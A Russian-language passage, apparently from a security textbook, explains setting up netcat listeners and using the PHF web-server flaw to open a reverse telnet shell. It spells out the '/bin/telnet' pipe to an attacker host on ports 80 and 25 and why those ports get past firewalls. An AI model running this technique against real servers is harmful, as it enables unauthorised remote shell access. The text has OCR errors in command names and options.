Прежде чем запускать утилиту пс, убедитесь, что в вашей системе с входящими портами 8 С и 25 не связано никаких служб, находящихся в режиме ожидания запросов, например HTTPD или sendmail. Если такие службы имеются, необходимо завершить выполнение соответствующих процессов с помощью команды kill, чтобы освободить требуемые порты для утилиты пс. Параметр -1 означает, что утилиту пс необходимо запустить в режиме ожидания запросов; параметр -v включает режим вывода подробной информации; параметр -n указывает, что IP-адреса не нужно преобразовывать в имена узлов, а параметр -р определяет порт, который будет прослушиваться.
Возвращаясь к рассматриваемому примеру, отметим, что для инициализации реверсивного соединения telnet на взламываемом сервере необходимо запустить следующую команду, действие которой основано на наличии уже известного нам изъяна PHF.
Давайте посмотрим, что происходит, когда Web-серверу броузер передает данную строку. С помощью команды /bin/telnet IР_хакера 80 на взламываемом узле запускается telnet и подключается к порту 80 нашего компьютера. Это позволит нам вводить команды, которые будут выполняться удаленным компьютером. В соответствии со стандартными соглашениями ввода/вывода системы UNIX все, что мы будем набирать на клавиатуре, будет перенаправляться в качестве ввода командной оболочке Bourne (/bin/sh). Выводимые же результаты с помощью конвейера будут перенаправлены командой /bin/telnet по адресу IР_хакера на порт 25. Все это вместе взятое и создаст реверсивный сеанс teinet-связи. отображаемый в двух окнах. Порты 80 и 25 выбраны из-за того, что большинство брандмауэров чаще всего разрешает их использовать для создания исходящих соединений. Однако можно выбрать и любые другие порты, — лишь бы их использование для обмена данными не блокировались брандмауэром.